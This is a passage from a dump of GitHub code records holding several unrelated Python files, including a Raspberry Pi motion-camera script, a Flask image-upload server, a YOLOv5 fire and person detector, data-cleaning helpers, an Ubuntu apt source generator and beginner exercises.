fmt='%.0f')\nnp.savetxt('./Hx_dpsi_4th_reg.txt', Hx_dpsi_4th_reg, fmt='%.0f')\n\n\nHy_dpsi_2nd_reg, Hx_dpsi_2nd_reg = grid_obj.Hy_dpsi_2nd_reg, grid_obj.Hx_dpsi_2nd_reg\nnp.savetxt('./Hy_dpsi_2nd_reg.txt', Hy_dpsi_2nd_reg, fmt='%.0f')\nnp.savetxt('./Hx_dpsi_2nd_reg.txt', Hx_dpsi_2nd_reg, fmt='%.0f')\n\n# %%\n","repo_name":"caoxiaoyue/potential_correction_develop","sub_path":"prepare_test_data/test_grid/for_test_data.py","file_name":"for_test_data.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11686176454","text":"import RPi.GPIO as GPIO\nimport time\nfrom picamera import PiCamera\n\ndef take_photo(camera):\n file_name = \"/home/pi/camera/img_\" + str(time.time()) + \".jpg\"\n camera.capture(file_name)\n return file_name\n \n\nPIR_PIN = 4\nLED_PIN = 17\n\n# Setup camera\ncamera = PiCamera()\ncamera.resolution = (720, 480)\ncamera.rotation = 180\nprint(\"Waiting 2 seconds to init the camera...\")\ntime.sleep(2)\nprint(\"Camera setup OK.\")\n\n# Setup GPIOs\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(PIR_PIN, GPIO.IN)\nGPIO.setup(LED_PIN, GPIO.OUT)\nGPIO.output(LED_PIN, GPIO.LOW)\nprint(\"GPIOs setup OK.\")\n\nMOV_DETECT_TRESHOLD = 3.0\nlast_pir_state = GPIO.input(PIR_PIN)\nmovement_timer = time.time()\nMIN_DURATION_BETWEEN_2_PHOTOS = 60.0\nlast_time_photo_taken = 0\n\nprint(\"Everything has been setup.\")\n\ntry:\n while True:\n time.sleep(0.01)\n pir_state = GPIO.input(PIR_PIN)\n if pir_state == GPIO.HIGH:\n GPIO.output(LED_PIN, GPIO.HIGH)\n else:\n GPIO.output(LED_PIN, GPIO.LOW)\n if last_pir_state == GPIO.LOW and pir_state == GPIO.HIGH:\n movement_timer = time.time()\n if last_pir_state == GPIO.HIGH and pir_state == GPIO.HIGH:\n if time.time() - movement_timer > MOV_DETECT_TRESHOLD:\n if time.time() - last_time_photo_taken > MIN_DURATION_BETWEEN_2_PHOTOS:\n print(\"Take photo and send it by email\")\n take_photo(camera)\n 
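# restart the cooldown window so at most one photo is taken per MIN_DURATION_BETWEEN_2_PHOTOS\n                    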
last_time_photo_taken = time.time()\n last_pir_state = pir_state\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n","repo_name":"capfish-yjy/raspberrypi_azure_face_recognition","sub_path":"rasoberryPi/pir_camera_azure.py","file_name":"pir_camera_azure.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36895094395","text":"import random,string,sqlite3\nfrom flask import Flask, request, send_from_directory,g,render_template,abort\napp = Flask(__name__)\n\ndef genRandomString(length):\n\treturn ''.join(random.choice(string.ascii_lowercase) for i in range(length))\n\t\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect('db.db')\n return db\n\t\ndef initdb():\n\tdb = get_db()\n\tcursor = db.cursor()\n\tcursor.execute(\"CREATE TABLE IF NOT EXISTS keys(name text NOT NULL, key text NOT NULL, admin boolean NOT NULL, unique (name, key))\")\n\tcursor.execute(\"CREATE TABLE IF NOT EXISTS uploads(name text NOT NULL, image text NOT NULL)\")\n\tcursor.execute(\"INSERT OR IGNORE INTO keys (name, key, admin) VALUES (?,?,?)\", ('Admin', 'CHANGEME', True))\n\tdb.commit()\n\t\ndef keySearch(key):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM keys WHERE key=?\", (key,))\n\tif cursor.fetchone() is not None:\n\t\treturn True\n\treturn False\n\t\ndef getName(key):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM keys WHERE key=?\", (key,))\n\tresult = cursor.fetchone()\n\tif result:\n\t\treturn result[0]\n\telse:\n\t\treturn None\n\t\t\ndef getImages(name):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM uploads WHERE name=?\", (name,))\n\treturn cursor.fetchall()\n\t\ndef isAdmin(key):\n\tcursor = get_db().cursor()\n\tcursor.execute(\"SELECT * FROM keys where key=?\", (key,))\n\tresult = cursor.fetchone()\n\tif result:\n\t\tif result[2] == 1:\n\t\t\treturn True\n\t\treturn False\n\treturn None\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n@app.route('/up', methods=['POST'])\ndef upload():\n\ttry:\n\t\tif keySearch(request.form['key']) == False:\n\t\t\treturn 'Your key is invalid!', 401\n\texcept:\n\t\treturn 'You must supply a key!', 401\n\timage = request.files['image']\n\tfilename = '{}.png'.format(genRandomString(6))\n\timage.save('u/{}'.format(filename))\n\tdb = get_db()\n\tcursor = db.cursor()\n\tcursor.execute(\"INSERT INTO uploads (name, image) VALUES (?,?)\", (getName(request.form['key']), filename))\n\tdb.commit()\n\treturn '{}u/{}'.format(request.url_root, filename), 200\n\t\n@app.route('/gallery', methods=['GET', 'POST'])\ndef login():\n\tif request.method == 'POST':\n\t\tif keySearch(request.form['key']):\n\t\t\tname=getName(request.form['key'])\n\t\t\treturn render_template('gallery.html', name=name, images=getImages(name))\n\treturn render_template('login.html'), 200\n\t\n@app.route('/admin', methods=['GET', 'POST'])\ndef admin():\n\tif request.method == 'POST' and isAdmin(request.form['key']):\n\t\treturn render_template('admin.html', key=request.form['key']), 200\n\treturn render_template('login.html'), 200\n\t\n@app.route('/adduser', methods=['POST'])\ndef adduser():\n\tif isAdmin(request.form['adminKey']):\n\t\tif request.form['admin']:\n\t\t\tadmin=True\n\t\telse:\n\t\t\tadmin=False\n\t\tdb = get_db()\n\t\tcursor = db.cursor()\n\t\tcursor.execute(\"INSERT OR IGNORE INTO keys (name, key, admin) VALUES 
(?,?,?)\", (request.form['name'], request.form['key'], admin))\n\t\tdb.commit()\n\t\treturn '{} added successfully!'.format(request.form['name']), 200\n\tabort(404)\n\t\n@app.route('/edituser', methods=['POST'])\ndef edituser():\n\tif isAdmin(request.form['adminKey']):\n\t\tdb = get_db()\n\t\tcursor = db.cursor()\n\t\tcursor.execute(\"UPDATE keys SET key = ? WHERE name = ?\", (request.form['key'], request.form['name']))\n\t\tdb.commit()\n\t\treturn '{} edited successfully!'.format(request.form['name']), 200\n\tabort(404)\n\n@app.route('/u/', methods=['GET'])\ndef u(image):\n\treturn send_from_directory('u', image), 200\n\t\nwith app.app_context():\n\tinitdb()","repo_name":"reciate/sharexfl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43108179327","text":"from mock import Mock, patch\nfrom pytest import fixture\n\nfrom configuration.spreadsheet_configuration import SpreadsheetConfiguration\n\n\n@fixture\ndef sheets_data():\n return {\n 'namedRanges': [{\n 'name': 'REPLACE_ME',\n 'range': {\n 'sheetId': '123',\n 'startColumnIndex': 1,\n 'endColumnIndex': 1,\n 'startRowIndex': 1,\n 'endRowIndex': 1\n }\n },\n {\n 'name': 'REPLACE_ME',\n 'range': {\n 'sheetId': '123',\n 'startColumnIndex': 1,\n 'endColumnIndex': 1,\n 'startRowIndex': 1,\n 'endRowIndex': 1\n }\n }],\n 'sheets': [{\n 'properties': {\n 'sheetId': '123',\n 'title': 'Test'\n }\n }]\n }\n\n\n@patch('configuration.spreadsheet_configuration.build')\ndef test_get_all_bases(mock_build, sheets_data):\n\n # Mock imported build for API\n sheets_mock = Mock()\n mock_build.return_value.spreadsheets.return_value = sheets_mock\n\n # Mock behaviour\n sheets_data['namedRanges'][0]['name'] = SpreadsheetConfiguration.BASE_VIDEOS_NAMED_RANGE\n sheets_mock.get.return_value.execute.return_value = sheets_data\n\n # Values to test\n values = [\n ['BaseUm', 'BaseArquivoUm.mp4'],\n ['Base2', 'Base2.mp4']\n ]\n\n sheets_mock.values.return_value.get.return_value.execute.return_value = {\n 'values': values\n }\n\n # Act\n configuration = SpreadsheetConfiguration('spreadsheet_id', 'credentials')\n all_base_videos = configuration.get_all_bases()\n\n # Assert\n assert len(all_base_videos) == 2\n assert all_base_videos[values[0][0]] == values[0][1]\n assert all_base_videos[values[1][0]] == values[1][1]\n","repo_name":"google/product_video_ads","sub_path":"video-generator/src/tests/unit/test_spreadsheet_configuration.py","file_name":"test_spreadsheet_configuration.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"41782340244","text":"import pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n\ndef cleanData(df):\n \"\"\"\n Clean data by replace NaN values with median.\n \"\"\"\n # use SimpleImputer to clean training data with median values\n imputer = SimpleImputer(strategy='median')\n imputer.fit(df)\n\n # transform the features\n x = imputer.transform(df)\n # convert the numpy array x to dataframe\n df = pd.DataFrame(x, columns=df.columns, index=list(df.index.values))\n\n # standardize columns whose max value is greater than threshold value\n # use the MinMaxScaler to standardize the target columns\n df = standardize_big_values_by_min_max(df)\n\n return df\n\n\ndef standardize_big_values_by_min_max(df, thresh=100):\n # find columns whose max value is 
greater than threshold value\n overThresh = df.max() > thresh\n targetCols = overThresh[overThresh].index.values\n\n scaler = MinMaxScaler()\n scaler.fit_transform(df[targetCols])\n\n return df\n\n\ndef mapYValues_binary(df):\n \"\"\"\n Maps the y values in the binary dataset.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {'background': 1, 'seal': 2}\n df.replace({'background': mapping}, inplace=True)\n return df\n\n\ndef mapResults_binary(df):\n \"\"\"\n Maps the results of the binary classification.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {1: 'background', 2: 'seal'}\n df.replace({'predictions': mapping}, inplace=True)\n return df\n\n\ndef mapYValues_multiclass(df):\n \"\"\"\n Maps the y values in the multi dataset.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {'background': 1, 'dead pup': 2, 'juvenile': 3, 'moulted pup': 4, 'whitecoat': 5}\n df.replace({'whitecoat': mapping}, inplace=True)\n return df\n\n\ndef mapResults_multi(df):\n \"\"\"\n Maps the results of the multi-class classification.\n\n :param df: The data\n :return df: The transformed dataset\n \"\"\"\n mapping = {1: 'background', 2: 'dead pup', 3: 'juvenile', 4: 'moulted pup', 5: 'whitecoat'}\n df.replace({'predictions': mapping}, inplace=True)\n return df\n","repo_name":"YeonwooSung/Seal_Image_Classification","sub_path":"src/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16263709000","text":"# this module help calc data\n\nimport queue\nimport threading\nimport time\nimport math\n\nfrom .location_config import SystemState\nfrom .location_list import LocationList\n\nclass LocationCalculater:\n def __init__(self,\n server, grd_location_syncer, sim_location_syncer\n ):\n print(\"__init__ LocationCalculater start\")\n\n self.info_queue = queue.Queue(-1) # recv json format\n self.query_queue = queue.Queue(-1)\n\n self.sensor_lock = threading.Lock()\n self.sensor_info = queue.Queue(5)\n\n self.server = server\n self.bind_map = None\n\n self.location_grd = LocationList(200,name='Guard',syncer=grd_location_syncer)\n self.location_sim = LocationList(200,name='Simulate',syncer=sim_location_syncer)\n LocationList.make_pair(self.location_grd, self.location_sim)\n\n # print(\"self.location_grd size =\",self.location_grd.size)\n # print(\"self.location_sim size =\",self.location_sim.size)\n\n self.update_lock = threading.Lock()\n self.need_recover = False\n\n self.location_log = queue.Queue(2000)\n\n # self.updata_thread stop with server's recv_thread stop\n self.update_thread=threading.Thread(target=self._location_update,args=())\n self.update_thread.daemon = True \n self.update_thread.start()\n\n self.start_timer = False\n self.time_list = {\"send\":-1,\"calc\":-1,\"sim\":-1}\n\n print(\"__init__ LocationCalculater end\")\n\n\n def _location_update(self):\n while True:\n recv_json = self.info_queue.get()\n self.system_update(recv_json)\n \n #todo if has simulate map update\n\n # if (self.start_timer):\n # if (self.time_list[\"calc\"]>0):\n # self.time_list[\"sim\"] = time.time()\n # self._print_delay()\n # self.start_timer = False\n \n if (self.server.is_shutdown()):break\n # print(1)\n # time.sleep(2)\n # print('end')\n \n def _print_delay(self):\n a,b,c = self.time_list['send'],self.time_list['calc'],self.time_list['sim']\n if (c-a > 0.2): \n s = \"delay: {:.6f} 
{}\".format(c-a,self.time_list)\n # warnings.warn(s,UserWarning)\n print(\"delay\\n\"*10)\n print(self.time_list)\n print(b-a,c-b,c-a)\n \n def bind_map_update(self):\n if self.bind_map:\n sim_irs_pos = self.location_sim.current_postion\n self.bind_map.update(sim_irs_pos.dict_style,self.start_timer,self.time_list[\"send\"])\n\n def switch_system_state(self,next_state:SystemState):\n self.location_grd.change_state(next_state)\n\n def get_sensor_group(self):\n sensor_data = [0,0,0,0]\n\n response_ids = []\n group_cnt=0\n\n while(not self.sensor_info.empty()):\n distance,need_location,term_id = self.sensor_info.get()\n group_cnt+=1\n \n for i in range(4):\n sensor_data[i] += distance[i]\n\n if need_location: response_ids.append(term_id)\n \n for i in range(4):\n sensor_data[i]/=group_cnt\n\n return sensor_data,response_ids\n\n def system_update(self, recv_json):\n term_id = recv_json['term_id']\n data_type = recv_json['type']\n info = recv_json['info']\n \n if data_type == \"SYSTEM_TYPE\":\n self.handle_system_data(info)\n return \n\n elif data_type == \"SENSOR_TYPE\":\n # print(recv_json)\n # 1) get 4 sensor\n sensor_info = [int(x) for x in info['sensor_info']]\n # 2) if has tag\n need_location = info['need_location']\n # 3) get send timestamp\n send_time = recv_json['send_time']\n\n if (need_location):\n print(\"[SNAPSHOT] need location_grd\\n\"*10) \n\n if (not self.start_timer and self.sensor_info.empty()): \n self.start_timer = True\n for k in self.time_list:\n self.time_list[k] = -1\n self.time_list[\"send\"] = send_time\n\n # 4) append sensor recv_json, if full advance once\n self.sensor_lock.acquire()\n\n self.sensor_info.put([sensor_info,need_location,term_id])\n if (self.sensor_info.full()):\n sensor_data,respond_ids = self.get_sensor_group()\n msg = []\n\n self.location_grd.advance_once(sensor_data,msg)\n\n if (self.start_timer):\n self.time_list[\"calc\"] = time.time()\n \n if (self.location_grd.is_unmovable):\n while (not self.query_queue.empty()):\n qid = self.query_queue.get()\n self.make_unmovable_reply(qid)\n\n for rid in respond_ids:\n self.make_snapshot_reply(rid)\n\n self.sensor_lock.release()\n\n #5) if has tag, should apply a msg \"SYSTEM_TYPE,ADJUST,on\"\n if need_location:\n self.switch_system_state(SystemState.ADJUST)\n return\n \n elif data_type == \"ACTION_TYPE\":\n self.handle_action_data(info)\n return \n\n elif data_type == \"ANGLE_TYPE\":\n self.handle_angle_data(info)\n return \n\n elif data_type == \"QUERY\":\n print(\"[QUERY] need location_grd\\n\"*1)\n # TODO set an threading reply by the first unmovable\n query_type = info['query_type']\n if (query_type=='position'):\n self.query_queue.put(term_id)\n elif (query_type=='system_state'):\n pass\n else:\n raise Exception(\"unknown query {}\".format(recv_json))\n\n elif data_type == \"SIMULATE\":\n self.location_sim.simulate_syncer_update(info)\n \n elif data_type == \"EOF\":\n print(\"shutdown\")\n self.server._shutdown = True\n return \n\n else:\n # unknown legal type\n raise Exception(\"Unknown data type {}\".format(recv_json))\n\n\n def handle_action_data(self,info):\n self.location_grd.set_action(info)\n pass\n\n def handle_angle_data(self,info):\n yaw_ground_angle=info['sdk_yaw_angle']\n self.location_grd.set_yaw_ground_angle(yaw_ground_angle)\n\n def handle_system_data(self,info):\n self.switch_system_state(SystemState[info['next_state']])\n\n def make_unmovable_reply(self,qid):\n assert(self.location_grd.is_unmovable)\n pos = self.location_grd.current_postion\n reply_json = {\n 'query_id': qid,\n 'type': 
'position',\n 'info': {\n 'location_analysis': self.location_grd.location_analysis.name,\n 'x': pos.x,\n 'y': pos.y,\n 'deg': pos.deg,\n 'rad': math.radians(pos.deg)\n }\n }\n # print(\"reply_json\",reply_json)\n self.server._send_msg_queue.put(reply_json)\n\n def make_snapshot_reply(self,qid):\n # assert(self.location_grd.is_unmovable)\n pos = self.location_grd.current_postion\n reply_json = {\n 'query_id': qid,\n 'type': 'snapshot',\n 'info': {\n 'location_analysis': self.location_grd.location_analysis.name,\n 'x': pos.x,\n 'y': pos.y,\n 'deg': pos.deg,\n 'rad': math.radians(pos.deg)\n }\n }\n self.server._send_msg_queue.put(reply_json)\n \n","repo_name":"mxy161610207/cpscps_testbed","sub_path":"testbed_platform/location/location_calculater.py","file_name":"location_calculater.py","file_ext":"py","file_size_in_byte":7629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15324256090","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\npath = './data/E3/E34'\n\ndef animate(i):\n data1 = pd.read_csv(path+'/data1.csv')\n data2 = pd.read_csv(path+'/data2.csv')\n data1 = data1.tail(100)\n data2 = data2.tail(100)\n x1 = data1['x_value']\n y1 = data1['sender_rssi']\n x2 = data2['x_value']\n y2 = data2[\"sender_rssi\"]\n\n\n plt.cla() #clear the axis\n\n plt.plot(x1, y1, label='Sender 1')\n plt.plot(x2, y2, label='Sender 2')\n plt.ylabel('RSSI')\n plt.xlabel('Packet Number')\n plt.legend(loc='upper left')\n plt.tight_layout()\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"wbechkit/dronmap","sub_path":"Python/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"37411902687","text":"import torch\n\nclass ImageAnalyzer:\n \"\"\"\n this class is used to detect fire in an image, as well as the presence of\n a human in the scene\n \"\"\"\n \n def __init__(self, path_to_yolo= \"./yolov5\",\n path_to_fire_model=\"./yolov5/models/fire.pt\", \n path_to_yolo_model = \"./yolov5/models/yolov5n.pt\",\n fire_confidence = 0.4,\n yolo_confidence = 0.6):\n \"\"\"\n initializes the models for detection\n Make sure to load the image first thing using load_image\n \"\"\"\n self._fire_model = torch.hub.load(path_to_yolo, \"custom\", \n path= path_to_fire_model, \n source=\"local\")\n self._yolo_model = torch.hub.load(path_to_yolo,\"custom\",\n path=path_to_yolo_model, \n source=\"local\")\n self.image = None\n self.image_width = None\n self.image_height = None\n self._fire_confidence = fire_confidence\n self._generic_confidence = yolo_confidence\n \n def load_image(self, img_source, width, height):\n \"\"\"\n this method loads the image from a file or PIL (Python Imaging Library) image object \n and specifies its width and height\n\n this method needs to be invoked first to tell the model which image to work on\n \"\"\"\n self.image = img_source\n self.image_width = width\n self.image_height = height\n return self\n\n def get_fire_model(self):\n \"\"\"\n Do not touch\n gets the yolov5 fire model that is trained for detecting fires\n \"\"\"\n return self._fire_model\n\n def get_generic_model(self):\n \"\"\"\n Do not touch\n gets the yolov5 detection model that is trained for detecting objects and humans\n \"\"\"\n return self._yolo_model\n\n def is_fire_detected(self):\n \"\"\"\n this method tells you whether 
there is a fire in the image that you loaded earlier\n returns true or false\n \"\"\"\n if self.image is None:\n return False\n if self._fire_model is None:\n return False\n if self.detect_fire() is not None:\n return True\n return False\n\n def detect_fire(self):\n \"\"\"\n Do Not touch\n This method is used internally to run the fire detection\n returns data that is understandable by the functions that are utilizing it\n not human readable.\n\n If curious please refer to the documentation of YOLOv5\n \"\"\"\n if self.image is None:\n return None\n if self._fire_model is None:\n return None\n data_frame = self._fire_model(self.image).pandas().xyxy[0]\n filtered_data_frame = (data_frame[ data_frame[\"confidence\"]> self._fire_confidence ])\n if filtered_data_frame.shape[0] > 0:\n return filtered_data_frame.iloc[0]\n else:\n return None\n\n def is_human_detected(self):\n \"\"\"\n this method tells you whether there is a human in the image that you loaded earlier\n returns true or false\n \"\"\"\n if self.image is None:\n return False\n if self._yolo_model is None:\n return False\n if self.detect_human() is not None:\n return True\n return False\n\n def detect_human(self):\n \"\"\"\n Do Not touch\n This method is used internally to run the human detection\n returns data that is understandable by the functions that are utilizing it\n not human readable.\n\n If curious please refer to the documentation of YOLOv5\n \"\"\"\n if self.image is None:\n return None\n if self._yolo_model is None:\n return None\n data_frame = self._yolo_model(self.image).pandas().xyxy[0]\n filtered_data_frame = (data_frame[ data_frame[\"confidence\"]> self._generic_confidence ])\n if filtered_data_frame.shape[0] > 0:\n return filtered_data_frame.iloc[0]\n else:\n return None\n\n def get_center(self, xmin,ymin,xmax,ymax):\n \"\"\"\n internal function that calculates the center given coordinates\n \"\"\"\n return (xmin + (xmax-xmin)/2), (ymin+(ymax - ymin)/2)\n\n def find_quadrant(self, x,y):\n \"\"\"\n This method is utilized internally; do not edit\n \"\"\"\n if self.image_width/2 < x:\n # right quadrants 1,4\n if self.image_height/2 0 and tinggi > 0:\r\n luas = round(0.5 * alas * tinggi)\r\n print(luas)\r\nelse:\r\n print(\"Alas dan tinggi harus > 0\")","repo_name":"IvanLeovandi/Praktikum-Dasar-Pemrograman-2021-2022","sub_path":"Praktikum 5/segitiga.py","file_name":"segitiga.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42200723966","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 17 09:20:18 2019\n\n@author: jyothyrajs\n\"\"\"\nfrom array import array as arr\n\ndef findSecLargest(a , n):\n l = a[0]\n sl = a[0]\n if(sl > l):\n l = sl\n sl = a[0]\n \n for i in range(1,n):\n x = a[i]\n if( x > l ):\n sl = l\n l = x\n elif ( x > sl ):\n sl = x\n print('Second Largest: ',sl)\n \ndef secLargestArray( ):\n print('No of Elements:')\n n = int(input())\n a = arr('i')\n print('Elements: ')\n for i in range( 0, n ):\n x = int(input())\n a.append(x)\n findSecLargest(a , n)\n \n \ndef main():\n secLargestArray()\n\nmain()","repo_name":"Jyothyrajs/Python","sub_path":"seLargArray.py","file_name":"seLargArray.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22264023000","text":"print('enter your academic details')\nprint('\\n')\nstudent_details = {}\nsize = int(input('enter the size of the 
dictionary: '))\nfor i in range(size):\n name = str(input('enter student name: '))\n Reg_number = str(input('enter stdudent registration number: '))\n age = int(input('enter student age: '))\n program = str(input('enter student program: '))\n year_of_study = int(input('enter student year of study'))\n subject = {}\n for i in range(1):\n subject1 = str(input('enter the first subject: '))\n subject2 = str(input('enter the second subject: '))\n subject3 = str(input('enter the third subject: '))\n subject4 = str(input('enter the fourth subject: '))\n subject['subject1'] = subject1\n subject['subject2'] = subject2\n subject['subject3'] = subject3\n subject['subject4'] = subject4\n scores = {}\n for i in range(1):\n marks1 = int(input('enter marks for subject1: '))\n marks2 = int(input('enter marks for subject2: '))\n marks3 = int(input('enter marks for subject3: '))\n marks4 = int(input('enter marks for subject4: '))\n scores['marks1'] = marks1\n scores['marks2'] = marks2\n scores['marks3'] = marks3\n scores['marks4'] = marks4\n grades = {} \n for i in range(1): \n grade1 = str(input('enter the grade for marks1: ')) \n grade2 = str(input('enter the grade for marks2: '))\n grade3 = str(input('enter the grade for marks3: '))\n grade4 = str(input('enter the grade for marks4: '))\n grades['grade1'] = grade1\n grades['grade2'] = grade2\n grades['grade3'] = grade3\n grades['grade4'] = grade4\n student_details[Reg_number] = {\n 'name': name,\n 'age' : age,\n 'program': program,\n 'year of study' : year_of_study,\n 'subjects' : subject,\n 'scores' : scores,\n 'grade' : grades\n }\nprint(student_details) \n","repo_name":"OgwangOsbornmark/studentresults","sub_path":"studentresults.py","file_name":"studentresults.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8747302970","text":"#!/usr/bin/env python #\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport wsgiref.handlers\r\nimport sys\r\n\r\nsys.path.append('modules')\r\nsys.path.append('models')\r\n\r\nfrom helloblog import *\r\n\r\nclass IntrepidSourceList(HelloBlog):\r\n def initialize(self,request,response):\r\n HelloBlog.initialize(self,request,response)\r\n\r\n self.mirrors={\r\n 'Archive.ubuntu.com更新服务器(欧洲,此为官方源,电信网通用户使用)':'http://archive.ubuntu.com/ubuntu/',\r\n 'Ubuntu.cn99.com更新服务器(江苏省常州市电信,推荐电信用户使用)':'http://ubuntu.cn99.com/ubuntu/',\r\n 'Mirrors.shlug.org更新服务器':'http://cn.archive.ubuntu.com/ubuntu',\r\n 'Mirror.lupaworld.com更新服务器(浙江省杭州市双线服务器)':'http://mirror.lupaworld.com/ubuntu',\r\n '厦门大学更新服务器(教育网服务器)':'ftp://ubuntu.realss.cn/ubuntu/',\r\n '成都市 电子科技大学更新服务器(教育网,推荐校园网和网通用户使用)':'http://ubuntu.uestc.edu.cn/ubuntu/',\r\n '成都市 电子科技大学更新服务器2':'http://ubuntu.dormforce.net/ubuntu/',\r\n '上海市上海交通大学更新服务器(教育网,推荐校园网和网通用户使用)':'http://ftp.sjtu.edu.cn/ubuntu/',\r\n '中国科学技术大学更新服务器(教育网,推荐校园网和网通用户使用)':'http://debian.ustc.edu.cn/ubuntu/',\r\n '中国台湾 台湾大学更新服务器':'http://ubuntu.csie.ntu.edu.tw/ubuntu/',\r\n 'mirror.rootguide.org更新服务器(上海市 电信)':'http://mirror.rootguide.org/ubuntu/',\r\n '台湾的官方源速度也相当不错,有时甚至快于内地的':'http://tw.archive.ubuntu.com/ubuntu'\r\n }\r\n\r\n self.mirror_url=[\r\n 'deb %s intrepid main restricted universe multiverse',\r\n 'deb %s intrepid-security main restricted universe multiverse',\r\n 'deb %s intrepid-updates main restricted universe multiverse',\r\n 'deb %s intrepid-backports main restricted universe multiverse',\r\n 'deb %s intrepid-proposed main restricted universe multiverse',\r\n ]\r\n\r\n self.mirror_src_url = [\r\n 'deb-src %s intrepid main 
restricted universe multiverse',\r\n 'deb-src %s intrepid-security main restricted universe multiverse',\r\n 'deb-src %s intrepid-updates main restricted universe multiverse',\r\n 'deb-src %s intrepid-backports main restricted universe multiverse',\r\n 'deb-src %s intrepid-proposed main restricted universe multiverse',\r\n ]\r\n \r\n def get(self):\r\n mirrors = []\r\n for key in self.mirrors.keys():\r\n mirrors.append(key)\r\n \r\n self.template_values = {\r\n 'mirrors':mirrors,\r\n 'IncludeSource':True,\r\n 'Output':''\r\n }\r\n\r\n self.render('templates/IntrepidSource.html')\r\n\r\n def post(self):\r\n iSel = self.param('mirror_id')\r\n\r\n include_src = self.param('include_src')\r\n\r\n \r\n mirrors = []\r\n\r\n mirror = self.mirrors[iSel.encode('utf8')]\r\n\r\n output = []\r\n \r\n for deb_url in self.mirror_url:\r\n output.append( deb_url % (mirror))\r\n\r\n if include_src == 'True':\r\n for deb_url in self.mirror_src_url:\r\n output.append( deb_url % ( mirror ))\r\n\r\n result = '#Ubuntu APT Source for %s ' % ( iSel ) + '\\n'\r\n result = result + '#Generate from http://superwar3fan.appsoot.com/Intrepid' + '\\n'\r\n result = result + '#Author Mail: gm8pleasure@gmail.com' + '\\n'\r\n result = result + '\\n'\r\n\r\n for o in output:\r\n result = result+o+'\\n'\r\n \r\n for key in self.mirrors.keys():\r\n mirrors.append(key)\r\n \r\n self.template_values = {\r\n 'mirrors':mirrors,\r\n 'IncludeSource':True,\r\n 'Output': result\r\n }\r\n self.render('templates/IntrepidSource.html')\r\n\r\ndef main():\r\n application = webapp.WSGIApplication([\r\n ('/Intrepid', IntrepidSourceList),\r\n ('/Intrepid/SourceGen', IntrepidSourceList), \r\n ],\r\n debug=True)\r\n wsgiref.handlers.CGIHandler().run(application)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"camark/entprj","sub_path":"Intrepid.py","file_name":"Intrepid.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21988787618","text":"from typing import Optional\nfrom structures import ListNode\n\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n cur, prv = head, None\n while cur:\n nxt = cur.next\n cur.next = prv\n prv = cur\n cur = nxt\n return prv\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n head.next.next.next.next = ListNode(5)\n\n result = solution.reverseList(head)\n\n while result:\n print(result.val)\n result = result.next\n\n\n\n\n","repo_name":"jinsDevelopment/Algorithm-Study","sub_path":"02-LinkedList/reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12711833002","text":"#!/usr/local/bin/python3\n\"\"\"PubSpork is a utility that helps you manage and track publications.\n\nIt was created by @tnabtaf to help track papers that reference\n@galaxyproject. However, it should be useful to manage any pubs that\nreference anything.\n\nSee README.md for more.\n\"\"\"\n\nimport argparse\n\nimport alert_sources\nimport lib_types\nimport report_formats\nimport generate_lib_report\nimport match_pubs\n\n\ndef get_args():\n \"\"\"Parse and return the command line arguments.\"\"\"\n\n arg_parser = argparse.ArgumentParser(\n description=(\n \"PubSpork helps manage and track publications. 
